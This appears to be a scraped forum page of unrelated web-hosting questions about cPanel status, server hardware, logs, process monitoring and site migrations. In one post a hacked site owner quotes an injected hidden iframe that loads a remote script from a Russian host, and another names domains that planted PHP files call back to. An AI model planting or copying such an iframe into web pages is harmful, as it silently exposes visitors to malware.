How Do I Find Out CPU Details Of My Server
Oct 2, 2009Q. I've a dedicated server and I'd like to find out my servers details [CPU, RAM, HDD] etc. How?
Q. My server comes with two HDDs. How do I access them through the WHM or cPanel?
Q. I've a dedicated server and I'd like to find out my servers details [CPU, RAM, HDD] etc. How?
Q. My server comes with two HDDs. How do I access them through the WHM or cPanel?
My friend can easily run a host command in unix to find information about a domain such as it's mail server, ip address etc.
how I can duplicate this functionaility in a windows environment?
cpsrvd up
Server Load 3.94 (4 cpus)
Memory Used 18.5 %
Swap Used 0 %
Disk /dev/md1 (/) 24 %
Disk /dev/md2 (/tmp) 3 %
Disk /dev/md3 (/home) 97 %
Disk /dev/md4 (/usr) 40 %
Disk /dev/md5 (/var) 75 %
Disk /dev/md0 (/boot) 30 %
Server load and Disk /dev/md3 (/home) are showing red dots.
to understand this page on cPanel. I can imagine that red dots are not a good thing while the green ones are, but I don't know what it all means or if I should be complaining about this to my host...
How do you get the file size/details of a file through ssh?
View 4 Replies View Relatedin the last archived log I found many of this line:
2007-08-25 06:48:22 1IOnZH-0000Gh-Jm == myemail@mysite.com R=virtual_user T=virtual_userdelivery defer (122): Disk quota exceeded: mailbox is full
2007-08-25 06:48:22 1IOnZH-0000Gh-Jm ** myemail@mysite.com : retry timeout exceeded
2007-08-25 10:06:18 1IOqem-0003LB-PX == myemail@mysite.com R=virtual_user T=virtual_userdelivery defer (122): Disk quota exceeded: mailbox is full
2007-08-25 10:06:18 1IOqem-0003LB-PX ** myemail@mysite.com : retry timeout exceeded
2007-08-25 10:09:15 1IOqhe-0003M7-IF == myemail@mysite.com R=virtual_user T=virtual_userdelivery defer (122): Disk quota exceeded: mailbox is full
2007-08-25 10:09:15 1IOqhe-0003M7-IF ** myemail@mysite.com : retry timeout exceeded
------------------------
Where I can found the details, if there are?
In httpd-status i see that some IPs hardly sending POST command to index.php but can i somehow find out what exactly they are trying to post and into which form on that page ?
View 5 Replies View RelatedI bought domain name and web hosting from a company. Now the problem is that the company from which I booked domain and hosting doesn't exist.
Initially the hosting company sent me only FTP and mail server details. Now I need the cPanel details to configure database. So kindly request all of you to suggest me some solutions through which I can get the cPanel details.
i run a dedicated server with theplanet.i have LAMP.what commands can i use in ssh to view the hardware details of my server ? i have centOS 5
View 5 Replies View Relatedhow to monitor a script running more details on TOP window?
I know command "top" will list all running tasks, a typical sample like this:
last pid: 28549; load averages: 0.06, 0.05, 0.06 10:40:53
45 processes: 44 sleeping, 1 on cpu
CPU states: 97.0% idle, 1.8% user, 1.2% kernel, 0.0% iowait, 0.0% swap
Memory: 32M real, 512K free, 15M swap in use, 186M swap free
PID USERNAME THR PRI NICE SIZE RES STATE TIME CPU COMMAND
28516 wnl 1 3 0 10M 7080K sleep 0:52 4.28% netscape
28549 wnl 1 23 0 1820K 1388K cpu 0:00 1.11% top
22839 root 1 34 0 9772K 4064K sleep 3:29 0.78% Xsun
28502 wnl 1 34 0 5220K 3824K sleep 0:14 0.34% emacs
28498 wnl 1 23 0 2792K 1764K sleep 0:00 0.07% xterm
28484 wnl 1 34 0 2104K 1484K sleep 0:00 0.04% olwm
122 root 3 33 0 2688K 1360K sleep 0:08 0.03% automountd
1 root 1 33 0 1564K 460K sleep 0:11 0.00% init
142 root 6 -13 0 1816K 1180K sleep 0:04 0.00% nscd
93 root 1 33 0 1800K 1088K sleep 0:04 0.00% in.named
180 root 1 34 -12 1552K 772K sleep 0:03 0.00% xntpd
98 root 1 23 0 1756K 912K sleep 0:02 0.00% inetd
126 root 1 33 0 1544K 924K sleep 0:02 0.00% syslogd
357 root 1 13 0 2636K 872K sleep 0:01 0.00% rpc.ttdbserver
136 root 1 23 0 1360K 676K sleep 0:01 0.00% cron
But I want to know further, like I am having a vbulletin forum, usually it just shows task name php, can I use top command or any other command/tool to list which page is being processing? like,
Code:
PID USERNAME THR PRI NICE SIZE RES STATE TIME CPU COMMAND
28516 wnl 1 3 0 10M 7080K sleep 0:52 4.28% /root/home/forums/showthread.php?t=1234
how can i do a search for all files (probs using regex) of files consisting purely of numbers?
for e.g. find:
53243.php
24353.php
24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
I've got a dedicated server running my portal. Now we plan to soon launch broadcasting, where we via a webcam + microphone will broadcast (streaming WMV media) to all our members. Our members will then be able to interact with the speakers via chatting.
Now we are currently undergoing loadtesting, with our current setup, which is:
1. dedicated server+ultrafast connection=>chatting
2. home PC with static IP and 1 MBit upload=>Video+Audio Streaming
So the member requests a page from the dedicated server, which has a chat window and a windows media player. The player will retrieve the video/audio content from the home PC. This is done by the client.
Now is pretty logical to see that there will be limitations in how many connections the home pc will be able to handle.
The question is: How do i make the dedicated server get the content from the home pc (so it only serves one connection) and then get all the clients to get their video content from the dedicated server ?
I've looked into the proxy modules for the apache server, however they (forward/reverse proxy) both passes the connection on to the remote machine and thereby not doing what I want to do.
I'm facing the task of migrating nearly 200 domains from 11.5 to a new server running 12. My question is whether any way to pre-populate the
FTP repository : hostname / username / password
Schedule : to daily / specify time / untick suspend domain
This would massively speed up the move, and remove the monotony of retyping these over and over!
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
Im trying to find the most reliable webhoster on the wed. Im looking to start a business where i can offer regular hosting as well as reseller accounts. Im looking for a good server with a low price.
View 8 Replies View Relatedas the title states,where do i find my server logs?
i run LAMP and have root access.
and once i find the file,how do i view it through shell?
Where can I find a list of servers in Israel and near by countries?
View 3 Replies View Relatedwho knows one?
View 12 Replies View RelatedMy server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
I hired a guy to secure and setup nameserves on my dedicated box. I'm on a time crunch and have not heard from him in 24 hours, so thought I'd ask here.
How can I find out if nameservers are running on my box, and what IP they are running on?
I have a problem with one of my domain. Some users around the world cannot access the website, but they can ping and traceroute the server without any problems. I am able to access the website perfectly.
Site URL is www.djluv.in
And we are using IPB 2.2
Moreover if theres another domain on the same server, they can access it.
There are about 25-30 users who are facing this problem, but from different part of the world so I cant even say ISP problem.
APF has been shutdown, no Ban Filters on IPB or cpanel.
What are the possible reasons why they couldn't access the website? how to fix the problem?
How do I go about finding if a certificate is installed on a Linux machine?
View 1 Replies View Relatedwhat the max number of hits is a quard core server with RAID disk system can handle, it is running on a Linux with separated MySQL server?
The host says there are no restrictions on the bandwith, but somehow it is strange we always only have MAX 300 users online (24/7/365) now I wonder if it just is that way or if some users might be denied access from time to time when they try to enter some of the websites hosted on the server ?
Maybe you know a monitoring service or something that can tell if this is an issue.
How do I find an account on cPanel Server mass mailing?
View 10 Replies View RelatedI cannot find my files after deploy war files..
I need to create a directory after unpacking war file process..
I need to know where is my files in server..
I have completed email set up on my server and have checked that email ports are open, but for some reason outlook keeps returning : "Outlook cannot find the server. Verify the server information is entered correctly in the Account Settings, and that you DNS settings in the Network pane of System Preferences are correct."
The odd thing is that outlook still picks up emails if I receive any, but keeps returning above error every minute.
how i could find out were the server is hosted by using the ip of the server, somehow.
View 3 Replies View RelatedI have problem:
Searching /root....
Found cpmove-clanpz.tar.gz!
Moving Packge to /root/cprestore/cpmove-clanpz.tar.gz
Extracting tarball....window.scroll(0,175);...............
Done
Extracting Domain....Done
Sorry, the copy failed. Unable to find the cpanel user file. Is the archive missing (cwd: /root/cprestore loaded cpmove-clanpz/cp/clanpz)?
checked 4 files.....
1. /scripts/pkgacct username...
2. Transfer backup to new server
3. /scripts/restorepkg username
4. this error
How can I find the data transfer rate on the server. I have done ifconfig -a , it
display the amout of data has been received and transfered. I want to see the live data transfer date. Can I able to check it?